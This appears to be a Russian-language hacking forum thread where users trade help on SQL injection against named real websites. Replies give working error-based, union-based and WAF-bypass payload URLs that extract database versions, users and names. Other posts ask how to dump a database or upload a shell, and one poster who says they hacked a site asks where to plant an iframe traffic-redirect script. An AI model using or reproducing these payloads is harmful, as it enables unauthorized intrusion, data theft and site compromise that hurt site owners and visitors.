Попытка слепого метода в Havij Почему когда Length of 'Current DB' is 16 все выводит нормально А когда Length of 'Current DB' is 63 выводится все в кубиках ?
Не путайте виды инъекций. Судя по всему, у вас Blind SQL и Double-Blind (Deep Blind) SQL. Если первой достаточно логического уровня и ответов типа true-false, то вторая дополнительно зависит от временных задержек между запросом и ответом сервера. При нестабильной реализации 2ого варианта, вы будете получать не только некорректные данные, но и парсить неправильную длину нужных вам данных. В вашем случае, Length of 'Current DB' скорее всего равен 62, и инъекция там не наблюдается.
Не продвинешься http://www.artena.ru/index.php?altname=sitemap/print'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/' 1044: Access denied for user 'artenaru_artena'@'localhost'
Юнион тоже актуален, в сорцах странице отображается, но бессмысленно) HTML: http://www.artena.ru/index.php?altname=sitemap/print'union/**/select(1),concat(1999,user(),1,version(),1,database()),34,4,5,6,7,8,user(),'10
Можно ли как-то это раскрутить. http://playzet.ru/stats/hlstats.php?game=dods&minkills=1&mode=players&rank_type=%5c
Там параметр походу выставляется статически, исходя по известным значениям, по параметрам можно только выбрать.Свой запрос туда не вставить
Не всё потеряно - HTML: http://playzet.ru/stats/hlstats.php?mode=weaponinfo&weapon=wdeagle\&game=%20or%201=1%20and%20@a:=1%20group%20by%20concat%28user%28%29,version%28%29,database%28%29,if%28@a=0,@a:=1,@a:=0%29%29%20having%20min%280%29%20--%20w
В конфигах апача прописан alias, например, /secret-folder/ ссылается на /var/private/secret/. И таким образом, при обращении ко всем доменам на сервере по URLу domen.com/secret-folder/ все будут попадать туда. Можно ли как-то закрыть туда доступ для определенного домена? Вариации через .htaccess не работают, так как он имеет меньший приоритет перед конфигами апача.
Известна версия '5.5.27-log Code: http://www.briese.net.ua/shkala-zarplat%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27 но дальше ни в какую не хочет раскручиваться.
http://www.briese.net.ua/shkala-zarplawertt%27and%28select%201%20from%28select%201%20from%28select%201%20union%20select%202%20%29fr%20group%20by%20concat%281,user%28%29,@a:=@a-1%29%20having%20min%28@a:=1%29%29s%29%20--%20w
Code: http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/* чет не получается может кто поможет нормально раскурить?
как посчитали 5 колонок? и что там делает кавычка? скуля же integer.. http://www.iglobalforum.com/event.php?id=90+and+0+/*!union*/select+1,2,3,4,version(),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3--+ вывод в <img src=version()..>
http://wiki.auditory.ru/Semenov_sql_injection' Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.
http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
привет )) взломал сайт а там такое в файле INDEX.PHP такое : <?php include 'init.php'; $language = $frontend->getDefaultLanguage(); $url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT; NeoNavigator::jump($url); ?> и такое : <?php include 'init.php'; include 'process.php'; ?> вот как выглядит сама система : http://i42.tinypic.com/112hpud.jpg КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?
При переходе на сайте на list.html?page=&page=' выдает Можно как-то раскрутить и попробовать слить бд или залить шелл? Хелпаните.. Если поставить скобки или другой символ, то же самое выдает. С &page=(select+top+1+table_name+from+information_schema.tables) Выдает мне Conversion failed when converting the nvarchar value 'Таблица' to data type int. (severity 16) in ..... но при (select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('эта таблица')) выдает мне message: Incorrect syntax near 'эта же таблица\'. (severity 15) in ....